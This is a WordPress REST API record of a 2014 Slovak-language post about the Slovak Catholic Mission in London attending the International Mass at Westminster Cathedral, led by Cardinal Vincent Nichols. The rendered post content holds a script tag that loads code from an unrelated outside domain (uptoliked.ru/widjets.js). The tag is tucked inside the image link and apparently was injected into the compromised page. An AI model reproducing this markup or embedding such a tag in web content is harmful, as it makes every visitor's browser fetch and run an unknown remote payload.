{"id":18434,"date":"2014-10-05T19:39:00","date_gmt":"2014-10-05T18:39:00","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=18434"},"modified":"2014-10-04T22:51:36","modified_gmt":"2014-10-04T21:51:36","slug":"scm-na-international-mass-vo-westminsterskej-katedrale","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=18434","title":{"rendered":"SCM na International Mass vo Westminsterskej katedr\u00e1le"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/10\/lb-a-westminster-188.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-18516\" alt=\"lb a westminster 188\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/10\/lb-a-westminster-188-150x150.jpg\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/10\/lb-a-westminster-188-150x150.jpg 150w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2014\/10\/lb-a-westminster-188-144x144.jpg 144w\" sizes=\"auto, (max-width: 150px) 100vw, 150px\" \/><script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/a>Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne sa v nede\u013eu 28. septembra 2014 z\u00fa\u010dastnila sv\u00e4tej om\u0161e (International Mass) pre v\u0161etky etnick\u00e9 skupiny v Lond\u00fdne vo westminsterskej katedr\u00e1le, ktor\u00fa volaj\u00fa aj Matka v\u0161etk\u00fdch anglick\u00fdch chr\u00e1mov. Liturgiu viedol kardin\u00e1l Vincent Nichols, s\u00eddeln\u00fd biskup diec\u00e9zy Westminster.<br \/>\nJe manifest\u00e1ciou jednoty a spolupatri\u010dnosti rozli\u010dn\u00fdch kult\u00far, jazykov, n\u00e1rodov, trad\u00edcii.<\/p>\n<p>\u00a0<img decoding=\"async\" class=\"ngg_displayed_gallery mceItem\" alt=\"\" src=\"http:\/\/www.scmlondon.org\/index.php\/nextgen-attach_to_post\/preview\/id--18514\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne sa v nede\u013eu 28. septembra 2014 z\u00fa\u010dastnila sv\u00e4tej om\u0161e (International Mass) pre v\u0161etky etnick\u00e9 skupiny v Lond\u00fdne vo westminsterskej katedr\u00e1le, ktor\u00fa volaj\u00fa aj Matka v\u0161etk\u00fdch&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=18434\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18434","post","type-post","status-publish","format-standard","hentry","category-7"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/18434","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18434"}],"version-history":[{"count":4,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/18434\/revisions"}],"predecessor-version":[{"id":18519,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/18434\/revisions\/18519"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18434"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18434"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18434"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}